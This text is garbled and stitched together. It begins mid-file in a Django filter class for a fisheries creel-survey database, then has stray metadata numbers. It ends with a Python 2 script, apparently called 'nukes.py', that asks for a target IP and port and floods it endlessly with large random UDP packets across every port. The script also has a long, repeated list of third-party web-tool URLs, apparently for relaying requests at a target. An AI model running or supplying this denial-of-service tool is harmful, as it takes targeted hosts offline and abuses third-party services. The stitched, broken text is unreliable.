field_name="fish__catch__interview__efftm1",
lookup_expr="lte",
help_text="format: HH:MM",
)
efftm1__gt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="gt",
help_text="format: HH:MM",
)
efftm1__lt = django_filters.TimeFilter(
field_name="fish__catch__interview__efftm1",
lookup_expr="lt",
help_text="format: HH:MM",
)
date = django_filters.DateFilter(
field_name="fish__catch__interview__date", help_text="format: yyyy-mm-dd"
)
date__gte = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
date__lte = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
date__gt = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="gt",
help_text="format: yyyy-mm-dd",
)
date__lt = django_filters.DateFilter(
field_name="fish__catch__interview__date",
lookup_expr="lt",
help_text="format: yyyy-mm-dd",
)
persons = django_filters.CharFilter(
field_name="fish__catch__interview__persons", lookup_expr="exact"
)
persons__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="gte"
)
persons__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="lte"
)
persons__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="gt"
)
persons__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__persons", lookup_expr="lt"
)
anglers = django_filters.CharFilter(
field_name="fish__catch__interview__anglers", lookup_expr="exact"
)
anglers__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="gte"
)
anglers__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="lte"
)
anglers__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="gt"
)
anglers__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__anglers", lookup_expr="lt"
)
rods = django_filters.CharFilter(
field_name="fish__catch__interview__rods", lookup_expr="exact"
)
rods__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="gte"
)
rods__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="lte"
)
rods__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="gt"
)
rods__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__rods", lookup_expr="lt"
)
angmeth = ValueInFilter(field_name="fish__catch__interview__angmeth")
angmeth__not = ValueInFilter(
field_name="fish__catch__interview__angmeth", exclude=True
)
comment1__like = django_filters.CharFilter(
field_name="fish__catch__interview__comment1", lookup_expr="icontains"
)
# FN011 ATTRIBUTES
year = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="exact"
)
year__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="gte"
)
year__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="lte"
)
year__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="gt"
)
year__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__creel__year", lookup_expr="lt"
)
prj_date0 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
help_text="format: yyyy-mm-dd",
)
prj_date0__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
prj_date0__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date0",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
prj_date1 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
help_text="format: yyyy-mm-dd",
)
prj_date1__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
prj_date1__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__creel__prj_date1",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
prj_cd = ValueInFilter(field_name="fish__catch__interview__sama__creel__prj_cd")
prj_cd__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__prj_cd", exclude=True
)
prj_cd__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="icontains",
)
prj_cd__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="icontains",
exclude=True,
)
prj_cd__endswith = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd", lookup_expr="endswith"
)
prj_cd__not_endswith = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_cd",
lookup_expr="endswith",
exclude=True,
)
prj_nm__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_nm",
lookup_expr="icontains",
)
prj_nm__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_nm",
lookup_expr="icontains",
exclude=True,
)
prj_ldr = django_filters.CharFilter(
field_name="fish__catch__interview__sama__creel__prj_ldr__username",
lookup_expr="iexact",
)
contmeth = ValueInFilter(field_name="fish__catch__interview__sama__creel__contmeth")
contmeth__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__contmeth", exclude=True
)
lake = ValueInFilter(field_name="fish__catch__interview__sama__creel__lake__abbrev")
lake__not = ValueInFilter(
field_name="fish__catch__interview__sama__creel__lake__abbrev", exclude=True
)
# SEASON FILTERS:
ssn = ValueInFilter(field_name="fish__catch__interview__sama__season__ssn")
ssn__not = ValueInFilter(
field_name="fish__catch__interview__sama__season__ssn", exclude=True
)
ssn__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn", lookup_expr="icontains"
)
ssn__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn",
lookup_expr="icontains",
exclude=True,
)
ssn_des = ValueInFilter(field_name="fish__catch__interview__sama__season__ssn_des")
ssn_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__season__ssn_des", exclude=True
)
ssn_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn_des",
lookup_expr="icontains",
)
ssn_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__season__ssn_des",
lookup_expr="icontains",
exclude=True,
)
ssn_date0 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
help_text="format: yyyy-mm-dd",
)
ssn_date0__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
ssn_date0__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date0",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
ssn_date1 = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
help_text="format: yyyy-mm-dd",
)
ssn_date1__gte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
lookup_expr="gte",
help_text="format: yyyy-mm-dd",
)
ssn_date1__lte = django_filters.DateFilter(
field_name="fish__catch__interview__sama__season__ssn_date1",
lookup_expr="lte",
help_text="format: yyyy-mm-dd",
)
# daytype filters
dtp = ValueInFilter(field_name="fish__catch__interview__sama__daytype__dtp")
dtp__not = ValueInFilter(
field_name="fish__catch__interview__sama__daytype__dtp", exclude=True
)
dtp_nm__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__daytype__dtp_nm",
lookup_expr="icontains",
)
dtp_nm__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__daytype__dtp_nm",
lookup_expr="icontains",
exclude=True,
)
# Period filters
prd = ValueInFilter(field_name="fish__catch__interview__sama__prd__prd")
prd__not = ValueInFilter(
field_name="fish__catch__interview__sama__prd__prd", exclude=True
)
prdtm0 = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
help_text="format: HH:MM",
)
prdtm0__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
lookup_expr="gte",
help_text="format: HH:MM",
)
prdtm0__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm0",
lookup_expr="lte",
help_text="format: HH:MM",
)
prdtm1 = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
help_text="format: HH:MM",
)
prdtm1__gte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
lookup_expr="gte",
help_text="format: HH:MM",
)
prdtm1__lte = django_filters.TimeFilter(
field_name="fish__catch__interview__sama__prd__prdtm1",
lookup_expr="lte",
help_text="format: HH:MM",
)
prd_dur__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__prd__prd_dur", lookup_expr="gte"
)
prd_dur__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__prd__prd_dur", lookup_expr="lte"
)
# SPACE filters
space = ValueInFilter(field_name="fish__catch__interview__sama__area__space")
space__not = ValueInFilter(
field_name="fish__catch__interview__sama__area__space", exclude=True
)
space__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space", lookup_expr="icontains"
)
space__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space",
lookup_expr="icontains",
exclude=True,
)
space_des = ValueInFilter(
field_name="fish__catch__interview__sama__area__space_des"
)
space_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__area__space_des", exclude=True
)
space_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space_des",
lookup_expr="icontains",
)
space_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__area__space_des",
lookup_expr="icontains",
exclude=True,
)
# TO DO - add NULL NOT_NULL
space_siz__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="gte"
)
space_siz__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="lte"
)
space_siz__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="gt"
)
space_siz__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__space_siz", lookup_expr="lt"
)
# TO DO - add NULL NOT_NULL
area_cnt__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="gte"
)
area_cnt__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="lte"
)
area_cnt__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="gt"
)
area_cnt__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_cnt", lookup_expr="lt"
)
# TO DO - add NULL NOT_NULL
area_wt__gte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="gte"
)
area_wt__lte = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="lte"
)
area_wt__gt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="gt"
)
area_wt__lt = django_filters.NumberFilter(
field_name="fish__catch__interview__sama__area__area_wt", lookup_expr="lt"
)
# MODE
mode = ValueInFilter(field_name="fish__catch__interview__sama__mode__mode")
mode__not = ValueInFilter(
field_name="fish__catch__interview__sama__mode__mode", exclude=True
)
mode__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode", lookup_expr="icontains"
)
mode__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode",
lookup_expr="icontains",
exclude=True,
)
mode_des = ValueInFilter(field_name="fish__catch__interview__sama__mode__mode_des")
mode_des__not = ValueInFilter(
field_name="fish__catch__interview__sama__mode__mode_des", exclude=True
)
mode_des__like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode_des",
lookup_expr="icontains",
)
mode_des__not_like = django_filters.CharFilter(
field_name="fish__catch__interview__sama__mode__mode_des",
lookup_expr="icontains",
exclude=True,
)
| 36.114701
| 88
| 0.718676
| 2,692
| 22,355
| 5.21471
| 0.050149
| 0.110272
| 0.159282
| 0.176948
| 0.879755
| 0.85525
| 0.8212
| 0.762715
| 0.714347
| 0.603077
| 0
| 0.00508
| 0.18989
| 22,355
| 618
| 89
| 36.173139
| 0.770072
| 0.025274
| 0
| 0.253788
| 0
| 0
| 0.294732
| 0.214463
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.003788
| 0
| 0.331439
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2679f8274f3a9c8bceb9cbd63dd7737bc4d8a86c
| 200
|
py
|
Python
|
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | 1
|
2020-03-25T03:27:24.000Z
|
2020-03-25T03:27:24.000Z
|
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
extensions/.stubs/clrclasses/System/Web/__init__.py
|
vicwjb/Pycad
|
7391cd694b7a91ad9f9964ec95833c1081bc1f84
|
[
"MIT"
] | null | null | null |
from __clrclasses__.System.Web import AspNetHostingPermission
from __clrclasses__.System.Web import AspNetHostingPermissionAttribute
from __clrclasses__.System.Web import AspNetHostingPermissionLevel
| 50
| 70
| 0.91
| 18
| 200
| 9.444444
| 0.444444
| 0.247059
| 0.352941
| 0.405882
| 0.511765
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.06
| 200
| 3
| 71
| 66.666667
| 0.904255
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
26e85077319a4b6246649873d4f38ddd3f073801
| 93,454
|
py
|
Python
|
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
nukes.py
|
orbitcentre/NUKES
|
e982a39200dfbe7680ff626fc05f8577799470be
|
[
"MIT"
] | null | null | null |
import threading
import socket
import os
import sys
import random
import time
os.system("clear")
time.sleep(5)
print (" ________________________________________________")
print (" / \ ")
print (" | _________________________________________ |")
print (" | | | |")
print (" | | C:\> cd DOST | |")
print (" | | C:\> python2/3 nuke.py | |")
print (" | | C:\> author 666rabit | |")
print (" | | C:\> orbitcentre_ | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | | | |")
print (" | |_________________________________________| |")
print (" | |")
print (" \_________________________________________________/")
print (" \___________________________________/")
print (" ___________________________________________")
print (" _-' .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. --- `-_")
print (" _-'.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.--. .-.-.`-_")
print (" _-'.-.-.-. .---.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-`__`. .-.-.-.`-_")
print (" _-'.-.-.-.-. .-----.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-----. .-.-.-.-.`-_")
print (" _-'.-.-.-.-.-. .---.-. .-------------------------. .-.---. .---.-.-.-.`-_")
print (":-------------------------------------------------------------------------:")
print ("`---._.-------------------------------------------------------------._.---'")
ip = raw_input("IP TARGET: ")
port = input("PORT: ")
fake_ip = "111.59.08.11"
os.system("clear")
###########
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
bytes = random._urandom(20000)
###########
print "[= ]"
time.sleep(2)
os.system("clear")
print "[== ]"
time.sleep(3)
os.system("clear")
print "[=== ]"
time.sleep(3)
os.system("clear")
print "[==== ]"
time.sleep(2)
os.system("clear")
print "[===== ]"
time.sleep(2)
os.system("clear")
print "[====== ]"
time.sleep(1)
os.system("clear")
print "[======= ]"
time.sleep(1)
os.system("clear")
print "[======== ]"
time.sleep(1)
os.system("clear")
print "[========= ]"
time.sleep(1)
os.system("clear")
print "[========== ]"
time.sleep(1)
os.system("clear")
print "[=========== ]"
time.sleep(1)
os.system("clear")
print "[============ ]"
time.sleep(1)
os.system("clear")
print "[============= ]"
time.sleep(1)
os.system("clear")
print "[============== ]"
time.sleep(1)
os.system("clear")
print "[=============== ]"
time.sleep(1)
os.system("clear")
print "[================ ]"
time.sleep(1)
os.system("clear")
print "[================= ]"
time.sleep(1)
os.system("clear")
print "[================== ]"
time.sleep(1)
os.system("clear")
print "[=================== ]"
time.sleep(1)
os.system("clear")
print "[====================]"
time.sleep(1)
os.system("clear")
sent = 0
while True:
sock.sendto(bytes, (ip,port))
sent = sent + 1
port = port + 1
print "sent %s packet to %s throught port:%s"%(sent,ip,port)
if port == 65534:
port = 1
def bots():
global bots
bots=[]
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
bots.append("http://downforeveryoneorjustme.com/")
bots.append("http://network-tools.com/default.asp?prog=ping&host=")
bots.append("http://network-tools.com/default.asp?prog=trace&host=")
bots.append("http://network-tools.com/default.asp?prog=network&host=")
bots.append("http://validator.w3.org/check?uri=")
bots.append("http://www.facebook.com/sharer/sharer.php?u=")
